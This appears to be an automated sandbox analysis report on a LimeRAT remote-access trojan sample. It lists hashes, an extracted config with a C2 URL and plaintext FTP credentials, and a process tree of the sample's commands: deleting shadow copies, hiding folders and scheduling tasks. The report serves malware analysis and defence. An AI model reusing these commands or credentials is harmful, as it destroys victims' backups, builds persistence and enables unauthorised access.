Overview

overview

10

Static

static

10

Client.exe

windows10-2004-x64

10

Analysis

  • max time kernel
    126s
  • max time network
    127s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20240611-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20240611-enlocale:en-usos:windows10-2004-x64system
  • submitted
    19-06-2024 14:30

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    Client.exe

  • Size

    241KB

  • MD5

    ccc910296b7389ba076ffeed54ec400b

  • SHA1

    6dc995e663fd4c84d35ace40733df462f3282340

  • SHA256

    ebf854c44cf0407faa99b0a60ced1b4805c33249cbc0828554cf1aef7b1c1c79

  • SHA512

    45ef0543176424185603492d7c9043f6b28b30611776d04606d4d041f385ab81f4c814d107b8d354baa3c43402be82fe82658fbf7348b9d89a9c0cde1e40b86c

  • SSDEEP

    6144:x5WE/UVPy/oCa+LDZWC9z51hDba8DTknq1di7QN:vWzPygCa+DZ7Dgnq1c4

Score
10/10
limeratdefense_evasionevasionexecutionimpactpersistenceransomwarerattrojan

Malware Config

Extracted

Credentials

  • Protocol:     ftp
  • Host:
    ftp.encompossoftware.com
  • Port:
    21
  • Username:
    remoteuser
  • Password:
    Encomposx99

Extracted

Family

limerat

Wallets

False

Attributes
  • aes_key

    1

  • antivm

    false

  • c2_url

    https://pastebin.com/raw/wEZKjNzb

  • download_payload

    false

  • install

    true

  • install_name

    svchost.exe

  • main_folder

    True

  • payload_url

    True

  • pin_spread

    true

  • sub_folder

    False

  • usb_spread

    false

Signatures

  • Contains code to disable Windows Defender 2 IoCs

    A .NET executable tasked with disabling Windows Defender capabilities such as realtime monitoring, blocking at first seen, etc.

  • LimeRAT

    Simple yet powerful RAT for Windows machines written in .NET.

    ratlimerat
  • Modifies WinLogon for persistence 2 TTPs 2 IoCs
    persistence
  • Modifies Windows Defender Real-time Protection settings 3 TTPs 4 IoCs
    evasiontrojan
  • Modifies security service 2 TTPs 1 IoCs
    evasion
  • Deletes shadow copies 3 TTPs

    Ransomware often targets backup files to inhibit system recovery.

    ransomwaredefense_evasionimpactexecution
  • Checks computer location settings 2 TTPs 1 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Executes dropped EXE 1 IoCs
  • Enumerates connected drives 3 TTPs 15 IoCs

    Attempts to read the root path of hard drives other than the default C: drive.

  • Legitimate hosting services abused for malware hosting/C2 1 TTPs 64 IoCs
  • Hide Artifacts: Hidden Files and Directories 1 TTPs 2 IoCs
    defense_evasion
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Disables Windows logging functionality 2 TTPs

    Changes registry settings to disable Windows Event logging.

  • Interacts with shadow copies 3 TTPs 12 IoCs

    Shadow copies are often targeted by ransomware to inhibit system recovery.

    ransomware
  • Scheduled Task/Job: Scheduled Task 1 TTPs 5 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

    persistenceexecution
  • Suspicious behavior: EnumeratesProcesses 9 IoCs
  • Suspicious use of AdjustPrivilegeToken 9 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs
  • Uses Task Scheduler COM API 1 TTPs

    The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.

    persistence
  • Uses Volume Shadow Copy service COM API

    The Volume Shadow Copy service is used to manage backups/snapshots.

    ransomware
  • Views/modifies file attributes 1 TTPs 4 IoCs
    evasion

Processes

  • C:\Users\Admin\AppData\Local\Temp\Client.exe
    "C:\Users\Admin\AppData\Local\Temp\Client.exe"
    1⤵
    • Modifies WinLogon for persistence
    • Modifies Windows Defender Real-time Protection settings
    • Modifies security service
    • Checks computer location settings
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of WriteProcessMemory
    PID:1932
    • C:\Windows\SYSTEM32\cmd.exe
      cmd /c attrib +H +S "C:\Users\Admin\\Branding" & attrib +H +S "C:\Users\Admin\\Branding\*" /S /D
      2⤵
      • Hide Artifacts: Hidden Files and Directories
      • Suspicious use of WriteProcessMemory
      PID:1880
      • C:\Windows\system32\attrib.exe
        attrib +H +S "C:\Users\Admin\\Branding"
        3⤵
        • Views/modifies file attributes
        PID:948
      • C:\Windows\system32\attrib.exe
        attrib +H +S "C:\Users\Admin\\Branding\*" /S /D
        3⤵
        • Views/modifies file attributes
        PID:3400
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "powershell" Get-MpPreference -verbose
      2⤵
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:4556
    • C:\Windows\SYSTEM32\cmd.exe
      cmd /c vssadmin Delete Shadows /all /quiet
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:3600
      • C:\Windows\system32\vssadmin.exe
        vssadmin Delete Shadows /all /quiet
        3⤵
        • Interacts with shadow copies
        PID:2312
    • C:\Windows\SYSTEM32\cmd.exe
      cmd /c vssadmin resize shadow /for=c: /on=c: /maxsize=401MB
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:2480
      • C:\Windows\system32\vssadmin.exe
        vssadmin resize shadow /for=c: /on=c: /maxsize=401MB
        3⤵
          PID:1032
      • C:\Windows\SYSTEM32\cmd.exe
        cmd /c vssadmin resize shadowstorage /for=c: /on=c: /maxsize=unbounded
        2⤵
        • Suspicious use of WriteProcessMemory
        PID:952
        • C:\Windows\system32\vssadmin.exe
          vssadmin resize shadowstorage /for=c: /on=c: /maxsize=unbounded
          3⤵
          • Interacts with shadow copies
          PID:804
      • C:\Windows\SYSTEM32\cmd.exe
        cmd /c vssadmin resize shadowstorage /for=d: /on=d: /maxsize=unbounded
        2⤵
          PID:4284
          • C:\Windows\system32\vssadmin.exe
            vssadmin resize shadowstorage /for=d: /on=d: /maxsize=unbounded
            3⤵
            • Enumerates connected drives
            • Interacts with shadow copies
            PID:3896
        • C:\Windows\SYSTEM32\cmd.exe
          cmd /c vssadmin resize shadowstorage /for=e: /on=e: /maxsize=401MB
          2⤵
          • Suspicious use of WriteProcessMemory
          PID:1184
          • C:\Windows\system32\vssadmin.exe
            vssadmin resize shadowstorage /for=e: /on=e: /maxsize=401MB
            3⤵
            • Enumerates connected drives
            • Interacts with shadow copies
            PID:3900
        • C:\Windows\SYSTEM32\cmd.exe
          cmd /c vssadmin resize shadowstorage /for=e: /on=e: /maxsize=unbounded
          2⤵
          • Suspicious use of WriteProcessMemory
          PID:4444
          • C:\Windows\system32\vssadmin.exe
            vssadmin resize shadowstorage /for=e: /on=e: /maxsize=unbounded
            3⤵
            • Enumerates connected drives
            • Interacts with shadow copies
            PID:4984
        • C:\Windows\SYSTEM32\cmd.exe
          cmd /c vssadmin resize shadowstorage /for=f: /on=f: /maxsize=401MB
          2⤵
          • Suspicious use of WriteProcessMemory
          PID:4396
          • C:\Windows\system32\vssadmin.exe
            vssadmin resize shadowstorage /for=f: /on=f: /maxsize=401MB
            3⤵
            • Enumerates connected drives
            • Interacts with shadow copies
            PID:1292
        • C:\Windows\SYSTEM32\cmd.exe
          cmd /c vssadmin resize shadowstorage /for=f: /on=f: /maxsize=unbounded
          2⤵
          • Suspicious use of WriteProcessMemory
          PID:628
          • C:\Windows\system32\vssadmin.exe
            vssadmin resize shadowstorage /for=f: /on=f: /maxsize=unbounded
            3⤵
            • Enumerates connected drives
            • Interacts with shadow copies
            PID:3304
        • C:\Windows\SYSTEM32\cmd.exe
          cmd /c vssadmin resize shadowstorage /for=g: /on=g: /maxsize=401MB
          2⤵
          • Suspicious use of WriteProcessMemory
          PID:1200
          • C:\Windows\system32\vssadmin.exe
            vssadmin resize shadowstorage /for=g: /on=g: /maxsize=401MB
            3⤵
            • Enumerates connected drives
            • Interacts with shadow copies
            PID:4068
        • C:\Windows\SYSTEM32\cmd.exe
          cmd /c vssadmin resize shadowstorage /for=g: /on=g: /maxsize=unbounded
          2⤵
          • Suspicious use of WriteProcessMemory
          PID:2836
          • C:\Windows\system32\vssadmin.exe
            vssadmin resize shadowstorage /for=g: /on=g: /maxsize=unbounded
            3⤵
            • Enumerates connected drives
            • Interacts with shadow copies
            PID:3172
        • C:\Windows\SYSTEM32\cmd.exe
          cmd /c vssadmin resize shadowstorage /for=h: /on=h: /maxsize=401MB
          2⤵
          • Suspicious use of WriteProcessMemory
          PID:4884
          • C:\Windows\system32\vssadmin.exe
            vssadmin resize shadowstorage /for=h: /on=h: /maxsize=401MB
            3⤵
            • Enumerates connected drives
            • Interacts with shadow copies
            PID:3968
        • C:\Windows\SYSTEM32\cmd.exe
          cmd /c vssadmin resize shadowstorage /for=h: /on=h: /maxsize=unbounded
          2⤵
          • Suspicious use of WriteProcessMemory
          PID:1960
          • C:\Windows\system32\vssadmin.exe
            vssadmin resize shadowstorage /for=h: /on=h: /maxsize=unbounded
            3⤵
            • Enumerates connected drives
            • Interacts with shadow copies
            PID:5036
        • C:\Windows\SYSTEM32\cmd.exe
          cmd /c Vssadmin delete shadowstorage /all /quiet
          2⤵
          • Suspicious use of WriteProcessMemory
          PID:4588
          • C:\Windows\system32\vssadmin.exe
            Vssadmin delete shadowstorage /all /quiet
            3⤵
            • Interacts with shadow copies
            PID:2160
        • C:\Windows\SYSTEM32\schtasks.exe
          schtasks /create /f /st "11:10" /sc daily /mo "5" /tn "NUC" /tr "'explorer'https://gsurl.be/kXFX"
          2⤵
          • Scheduled Task/Job: Scheduled Task
          PID:2756
        • C:\Windows\SYSTEM32\schtasks.exe
          schtasks /create /f /st "21:41" /sc daily /mo "5" /tn "NUC" /tr "'explorer'https://gsurl.be/kXFX"
          2⤵
          • Scheduled Task/Job: Scheduled Task
          PID:2268
        • C:\Windows\SYSTEM32\schtasks.exe
          schtasks /create /f /st "03:40" /sc daily /mo "2" /tn "NUC" /tr "'explorer'https://gsurl.be/kXFX"
          2⤵
          • Scheduled Task/Job: Scheduled Task
          PID:4456
        • C:\Windows\SYSTEM32\schtasks.exe
          schtasks /create /f /st "06:27" /sc weekly /mo "2" /d "Wed" /tn "NUC" /tr "'explorer'https://gsurl.be/kXFX"
          2⤵
          • Scheduled Task/Job: Scheduled Task
          PID:2160
        • C:\Windows\SYSTEM32\schtasks.exe
          schtasks /create /f /st "17:29" /sc monthly /m "nov" /tn "NUC" /tr "'explorer'https://gsurl.be/kXFX"
          2⤵
          • Scheduled Task/Job: Scheduled Task
          PID:1828
        • C:\Users\Admin\Branding\svchost.exe
          "C:\Users\Admin\Branding\svchost.exe"
          2⤵
          • Modifies WinLogon for persistence
          • Executes dropped EXE
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:1940
          • C:\Windows\SYSTEM32\cmd.exe
            cmd /c attrib +H +S "C:\Users\Admin\\Branding" & attrib +H +S "C:\Users\Admin\\Branding\*" /S /D
            3⤵
            • Hide Artifacts: Hidden Files and Directories
            PID:664
            • C:\Windows\system32\attrib.exe
              attrib +H +S "C:\Users\Admin\\Branding"
              4⤵
              • Views/modifies file attributes
              PID:864
            • C:\Windows\system32\attrib.exe
              attrib +H +S "C:\Users\Admin\\Branding\*" /S /D
              4⤵
              • Views/modifies file attributes
              PID:2468
      • C:\Windows\system32\vssvc.exe
        C:\Windows\system32\vssvc.exe
        1⤵
        • Suspicious use of AdjustPrivilegeToken
        PID:1176

      Network

      MITRE ATT&CK Enterprise v15

      Reconnaissance

      Resource Development

      Initial Access

      Execution

      Scheduled Task/Job

      1
      T1053

      Scheduled Task

      1
      T1053.005

      Windows Management Instrumentation

      1
      T1047

      Persistence

      Boot or Logon Autostart Execution

      1
      T1547

      Winlogon Helper DLL

      1
      T1547.004

      Create or Modify System Process

      2
      T1543

      Windows Service

      2
      T1543.003

      Scheduled Task/Job

      1
      T1053

      Scheduled Task

      1
      T1053.005

      Privilege Escalation

      Boot or Logon Autostart Execution

      1
      T1547

      Winlogon Helper DLL

      1
      T1547.004

      Create or Modify System Process

      2
      T1543

      Windows Service

      2
      T1543.003

      Scheduled Task/Job

      1
      T1053

      Scheduled Task

      1
      T1053.005

      Defense Evasion

      Direct Volume Access

      1
      T1006

      Hide Artifacts

      2
      T1564

      Hidden Files and Directories

      2
      T1564.001

      Impair Defenses

      2
      T1562

      Disable or Modify Tools

      2
      T1562.001

      Indicator Removal

      2
      T1070

      File Deletion

      2
      T1070.004

      Modify Registry

      4
      T1112

      Credential Access

      Discovery

      Peripheral Device Discovery

      1
      T1120

      Query Registry

      3
      T1012

      System Information Discovery

      3
      T1082

      Lateral Movement

      Collection

      Command and Control

      Web Service

      1
      T1102

      Exfiltration

      Impact

      Inhibit System Recovery

      2
      T1490

      Replay Monitor

      Loading Replay Monitor...

      Downloads

      • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_2got23vd.05h.ps1
        Filesize

        60B

        MD5

        d17fe0a3f47be24a6453e9ef58c94641

        SHA1

        6ab83620379fc69f80c0242105ddffd7d98d5d9d

        SHA256

        96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

        SHA512

        5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

        Download Submit

      • C:\Users\Admin\Branding\svchost.exe
        Filesize

        241KB

        MD5

        ccc910296b7389ba076ffeed54ec400b

        SHA1

        6dc995e663fd4c84d35ace40733df462f3282340

        SHA256

        ebf854c44cf0407faa99b0a60ced1b4805c33249cbc0828554cf1aef7b1c1c79

        SHA512

        45ef0543176424185603492d7c9043f6b28b30611776d04606d4d041f385ab81f4c814d107b8d354baa3c43402be82fe82658fbf7348b9d89a9c0cde1e40b86c

        Download Submit

      • memory/1932-0-0x00007FFBA4EC3000-0x00007FFBA4EC5000-memory.dmp

        Filesize

        8KB

        Download

      • memory/1932-1-0x000001715BCE0000-0x000001715BD22000-memory.dmp

        Filesize

        264KB

        Download

      • memory/1932-19-0x00007FFBA4EC0000-0x00007FFBA5981000-memory.dmp

        Filesize

        10.8MB

        Download

      • memory/1932-31-0x00007FFBA4EC0000-0x00007FFBA5981000-memory.dmp

        Filesize

        10.8MB

        Download

      • memory/4556-7-0x000001F245120000-0x000001F245142000-memory.dmp

        Filesize

        136KB

        Download

      • memory/4556-12-0x00007FFBA4EC0000-0x00007FFBA5981000-memory.dmp

        Filesize

        10.8MB

        Download

      • memory/4556-13-0x00007FFBA4EC0000-0x00007FFBA5981000-memory.dmp

        Filesize

        10.8MB

        Download

      • memory/4556-14-0x00007FFBA4EC0000-0x00007FFBA5981000-memory.dmp

        Filesize

        10.8MB

        Download

      • memory/4556-17-0x00007FFBA4EC0000-0x00007FFBA5981000-memory.dmp

        Filesize

        10.8MB

        Download